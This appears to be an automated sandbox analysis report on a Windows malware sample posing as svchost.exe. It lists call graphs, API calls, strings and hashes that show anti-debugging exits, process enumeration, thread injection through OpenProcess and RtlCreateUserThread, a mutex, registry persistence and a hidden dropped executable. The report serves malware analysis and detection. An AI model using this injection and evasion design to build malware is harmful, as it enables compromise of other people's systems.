RtlCreateUserThread 1319->1320 1320->1313 1322 7ff67e6d1399 CloseHandle 1320->1322 1321 7ff67e6d1444 GetSystemInfo 1323 7ff67e6d12f4 1321->1323 1324 7ff67e6d13b2 1322->1324 1323->1319 1323->1322 1324->1313 1326 7ff67e6d3764 GetVolumeInformationW 1325->1326 1327 7ff67e6d375a 1325->1327 1328 7ff67e6d37e0 1326->1328 1327->1326 1329 7ff67e6d384a wsprintfW 1328->1329 1329->1292 1331 7ff67e6d400b Process32FirstW 1330->1331 1332 7ff67e6d32fe 1330->1332 1333 7ff67e6d4065 CloseHandle 1331->1333 1334 7ff67e6d402a wcscmp 1331->1334 1332->1308 1333->1332 1335 7ff67e6d404e Process32NextW 1334->1335 1336 7ff67e6d4041 1334->1336 1335->1333 1335->1334 1336->1333 1338 7ff67e6d13ff 1337->1338 1338->1311 1340 7ff67e6d12ea 1339->1340 1340->1319 1340->1321 1342 7ff67e6d4356 1341->1342 1343 7ff67e6d4377 GetLastError 1341->1343 1347 7ff67e6d4250 GetFileSize 1342->1347 1344 7ff67e6d323b CreateThread Sleep CreateThread 1343->1344 1344->866 1352 7ff67e6d3b20 VirtualAlloc 1347->1352 1349 7ff67e6d427c 1350 7ff67e6d42c6 CloseHandle 1349->1350 1351 7ff67e6d4290 SetFilePointer ReadFile 1349->1351 1350->1344 1351->1350 1352->1349 1354 7ff67e6d39c5 RegSetValueExW RegCloseKey 1353->1354 1355 7ff67e6d39c1 1353->1355 1354->1355 1355->1167 1429 7ff67e6d3078 1434 7ff67e6d3081 1429->1434 1430 7ff67e6d316d 1433 7ff67e6d3bf0 RegDeleteKeyW 1433->1434 1434->1430 1434->1433 1435 7ff67e6d3df0 9 API calls 1434->1435 1436 7ff67e6d3980 3 API calls 1434->1436 1438 7ff67e6d4410 CreateFileW 1434->1438 1443 7ff67e6d3b50 RegOpenKeyExW 1434->1443 1435->1434 1437 7ff67e6d315d Sleep 1436->1437 1437->1434 1439 7ff67e6d446b 1438->1439 1440 7ff67e6d44a6 1438->1440 1446 7ff67e6d4390 SetFilePointer WriteFile SetEndOfFile 1439->1446 1440->1434 1442 7ff67e6d4487 SetFileAttributesW CloseHandle 1442->1440 1444 7ff67e6d3ba4 RegSetValueExW RegCloseKey 1443->1444 1445 7ff67e6d3bde 1443->1445 1444->1445 1445->1434 1446->1442 1470 7ff67e6d2f38 1471 7ff67e6d3890 11 API calls 1470->1471 1472 7ff67e6d2f77 1471->1472 1473 7ff67e6d4530 17 API calls 1472->1473 1474 7ff67e6d2f9b 1473->1474 1475 7ff67e6d4090 5 API calls 1474->1475 1476 7ff67e6d2fbe 1475->1476 1477 7ff67e6d10d8 11 API calls 1476->1477 1478 7ff67e6d2fd3 GetProcessHeap HeapFree 1477->1478

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF67E6DE6B4 1 Function_00007FF67E6D40B0 62 Function_00007FF67E6D3B20 1->62 83 Function_00007FF67E6D3AF0 1->83 2 Function_00007FF67E6D3CB0 3 Function_00007FF67E6E00B0 4 Function_00007FF67E6DE4AB 5 Function_00007FF67E6D32A8 17 Function_00007FF67E6D4090 5->17 18 Function_00007FF67E6D3890 5->18 60 Function_00007FF67E6D4530 5->60 61 Function_00007FF67E6D3C30 5->61 97 Function_00007FF67E6D10D8 5->97 6 Function_00007FF67E6D33A8 7 Function_00007FF67E6D2EA8 8 Function_00007FF67E6DFEA9 9 Function_00007FF67E6DF6A3 10 Function_00007FF67E6E01A2 11 Function_00007FF67E6DE0A5 12 Function_00007FF67E6DE0A1 13 Function_00007FF67E6D149C 14 Function_00007FF67E6DCE9D 15 Function_00007FF67E6D2498 16 Function_00007FF67E6DDA94 100 Function_00007FF67E6D3FD0 17->100 67 Function_00007FF67E6D3710 18->67 19 Function_00007FF67E6D4390 20 Function_00007FF67E6D3188 71 Function_00007FF67E6D3008 20->71 21 Function_00007FF67E6D1088 22 Function_00007FF67E6D3388 98 Function_00007FF67E6D24D8 22->98 23 Function_00007FF67E6DE289 24 Function_00007FF67E6DE07F 25 Function_00007FF67E6D147F 26 Function_00007FF67E6D3980 27 Function_00007FF67E6DB776 28 Function_00007FF67E6DE079 29 Function_00007FF67E6D3078 29->26 49 Function_00007FF67E6D3B50 29->49 68 Function_00007FF67E6D4410 29->68 85 Function_00007FF67E6D3BF0 29->85 86 Function_00007FF67E6D3DF0 29->86 30 Function_00007FF67E6DB778 31 Function_00007FF67E6DB772 32 Function_00007FF67E6DEA72 33 Function_00007FF67E6DB26F 34 Function_00007FF67E6DEC71 35 Function_00007FF67E6D216C 36 Function_00007FF67E6D3368 36->98 37 Function_00007FF67E6DE668 38 Function_00007FF67E6DB061 39 Function_00007FF67E6DB05A 40 Function_00007FF67E6DD65A 41 Function_00007FF67E6DFE5A 42 Function_00007FF67E6D2458 43 Function_00007FF67E6D3559 44 Function_00007FF67E6DB052 45 Function_00007FF67E6DB152 46 Function_00007FF67E6DC14F 47 Function_00007FF67E6DB04E 48 Function_00007FF67E6D4250 48->62 50 Function_00007FF67E6DF74B 51 Function_00007FF67E6DF747 52 Function_00007FF67E6D3348 52->98 53 Function_00007FF67E6DF749 54 Function_00007FF67E6DB248 55 Function_00007FF67E6D1444 56 Function_00007FF67E6D3A40 56->18 56->26 56->67 57 Function_00007FF67E6D153C 57->13 87 Function_00007FF67E6D14EC 57->87 58 Function_00007FF67E6DDC37 59 Function_00007FF67E6D2F38 59->17 59->18 59->60 59->61 59->97 106 Function_00007FF67E6D44C0 60->106 63 Function_00007FF67E6DEC20 64 Function_00007FF67E6D3418 64->1 64->2 64->5 64->6 64->56 64->57 65 Function_00007FF67E6D3218 64->65 84 Function_00007FF67E6D41F0 64->84 93 Function_00007FF67E6D3EE0 64->93 108 Function_00007FF67E6D31B8 64->108 65->18 76 Function_00007FF67E6D4300 65->76 66 Function_00007FF67E6D2418 94 Function_00007FF67E6D36E0 67->94 68->19 69 Function_00007FF67E6DD70B 70 Function_00007FF67E6D2E08 71->70 72 Function_00007FF67E6DEC09 73 Function_00007FF67E6DEA05 74 Function_00007FF67E6DDE04 75 Function_00007FF67E6D1000 76->48 77 Function_00007FF67E6DBBFB 78 Function_00007FF67E6DBBF7 79 Function_00007FF67E6DE9F6 80 Function_00007FF67E6DBBF9 81 Function_00007FF67E6DC4F8 82 Function_00007FF67E6DBBF2 88 Function_00007FF67E6DD2E7 89 Function_00007FF67E6DF7E6 90 Function_00007FF67E6DD2E3 91 Function_00007FF67E6DD2E5 92 Function_00007FF67E6DC2E4 95 Function_00007FF67E6DCCE1 96 Function_00007FF67E6E01DA 97->55 97->75 103 Function_00007FF67E6D13C4 97->103 98->15 98->42 98->66 99 Function_00007FF67E6DB0D8 101 Function_00007FF67E6DE6CD 102 Function_00007FF67E6D36C8 104 Function_00007FF67E6DE6C5 105 Function_00007FF67E6D35C5 107 Function_00007FF67E6DB2C0 109 Function_00007FF67E6D36B8 110 Function_00007FF67E6DEDB8

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF67E6D3418 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff67e6d3418-7ff67e6d342e call 7ff67e6d153c call 7ff67e6d31b8 236 7ff67e6d3430-7ff67e6d3432 ExitProcess 231->236 237 7ff67e6d3438-7ff67e6d3466 call 7ff67e6d40b0 call 7ff67e6d3cb0 call 7ff67e6d3ee0 231->237 244 7ff67e6d34b7-7ff67e6d34ca call 7ff67e6d3ee0 237->244 245 7ff67e6d3468-7ff67e6d3479 call 7ff67e6d41f0 237->245 252 7ff67e6d34cc-7ff67e6d34dd call 7ff67e6d41f0 244->252 253 7ff67e6d3508-7ff67e6d351b call 7ff67e6d3ee0 244->253 250 7ff67e6d348e-7ff67e6d3490 ExitProcess 245->250 251 7ff67e6d347b-7ff67e6d348c call 7ff67e6d41f0 245->251 251->250 262 7ff67e6d3496 call 7ff67e6d32a8 251->262 260 7ff67e6d34df-7ff67e6d34e1 ExitProcess 252->260 261 7ff67e6d34e7 call 7ff67e6d3218 252->261 263 7ff67e6d355e-7ff67e6d3574 call 7ff67e6d3a40 call 7ff67e6d33a8 253->263 264 7ff67e6d351d-7ff67e6d352e call 7ff67e6d41f0 253->264 269 7ff67e6d34ec-7ff67e6d34f1 261->269 271 7ff67e6d349b-7ff67e6d34a0 262->271 283 7ff67e6d35ca-7ff67e6d36a2 CreateThread * 3 WaitForMultipleObjects ExitProcess 263->283 284 7ff67e6d3576-7ff67e6d3587 call 7ff67e6d41f0 263->284 278 7ff67e6d3530-7ff67e6d3532 ExitProcess 264->278 279 7ff67e6d3538 call 7ff67e6d3218 264->279 273 7ff67e6d34f3-7ff67e6d34fe Sleep 269->273 274 7ff67e6d3500-7ff67e6d3502 ExitProcess 269->274 276 7ff67e6d34a2-7ff67e6d34ad SleepEx 271->276 277 7ff67e6d34af-7ff67e6d34b1 ExitProcess 271->277 273->269 276->271 282 7ff67e6d353d-7ff67e6d3542 279->282 285 7ff67e6d3544-7ff67e6d354f Sleep 282->285 286 7ff67e6d3551-7ff67e6d3553 ExitProcess 282->286 289 7ff67e6d359c-7ff67e6d359e ExitProcess 284->289 290 7ff67e6d3589-7ff67e6d359a call 7ff67e6d41f0 284->290 285->282 290->289 293 7ff67e6d35a4 call 7ff67e6d32a8 290->293 295 7ff67e6d35a9-7ff67e6d35ae 293->295 296 7ff67e6d35b0-7ff67e6d35bb Sleep 295->296 297 7ff67e6d35bd-7ff67e6d35bf ExitProcess 295->297 296->295
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: e87306f6a7a0cfedb6463fad955b299d55effb781b6f6de6d98aff86174bf403
                                                                                                                                                                                                                        • Instruction ID: 3b1619daec0b290ab485adbc266ca42367895e9dae2bc9fdfd23e08073023bb3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e87306f6a7a0cfedb6463fad955b299d55effb781b6f6de6d98aff86174bf403
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3161FB2B968A8391EF64EB21EC5937B62A0BF64700FF00135F54ECA5D6DE2DE40DA650
                                                                                                                                                                                                                        Function 00007FF67E6D10D8 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: 03f7ad54ce5e2d6a3d0f3db6287a51554fdd0eb8ab4b1090cc3d2c0e04c54606
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3871FE7651CA8586EB70CB25E44436BB7A0F7A4744FB04135E68DC6B98DFBCD488DB40
                                                                                                                                                                                                                        Function 00007FF67E6D40B0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction ID: ccd0c30b816533b76b7d9fef8d3a960c77cc63226294780ae9adebb17a83f842
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A531EE3762CA4186DB50CB15E85472BB760FBE4B84F605035FA8E87B68DF7CD4499B00
                                                                                                                                                                                                                        Function 00007FF67E6D4530 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction ID: 02b80201c72cd2155aaf287f01f89a5aec35d4ac59583040a554b4b930d81df5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F810E36618B8182EB50CB56F88436BB7A0FBD9B95F604135EA8D87768DF3CD448DB00
                                                                                                                                                                                                                        Function 00007FF67E6D3890 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF67E6D3750
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3710: GetVolumeInformationW.KERNELBASE ref: 00007FF67E6D37CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3710: wsprintfW.USER32 ref: 00007FF67E6D386E
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38D9
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38EE
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3901
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3911
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3924
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3939
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D394C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3961
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: e724a501fcc4b427934853a5f1cdcc4efb9286cbaa29a2711b7771ae621e4adc
                                                                                                                                                                                                                        • Instruction ID: 175f54d494d64f5253d1be05dfa0764a6a11cd336b90bf030e89a692e7cb523d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e724a501fcc4b427934853a5f1cdcc4efb9286cbaa29a2711b7771ae621e4adc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0011302A63898685DF60CF25F86436B6362FBE4B44FA05032E94E87A28DF3CD00C9744
                                                                                                                                                                                                                        Function 00007FF67E6D2E08 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction ID: 49a56ea58ed91feb0a5e844c96aa0980211596faac8218015bfa95f0925bc11b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B401D72B92CA4282EA20DB11E85822A6761FBE8B94FB40531F94EC6664CE3CD59D9600
                                                                                                                                                                                                                        Function 00007FF67E6D3FD0 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction ID: 7d21127e240c5ed3a1a08a51ef0b2660040d9451bcb5b00a2f4f153e37684cc4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9511E27691C68682EB70DF11E44C36B6360FBA4754F704234E69D86598DF3DD848DB00
                                                                                                                                                                                                                        Function 00007FF67E6D3710 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction ID: 30d4f9c9ac83e363e3c8d829e6d07e4dc32704cda09f5f1026b57fa850118faf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A31F52A62C6C186DB30DF64E4983ABB3A0FB94744FA05136E68DC7A58DF7DC509DB00
                                                                                                                                                                                                                        Function 00007FF67E6D3008 Relevance: 4.5, APIs: 3, Instructions: 24sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
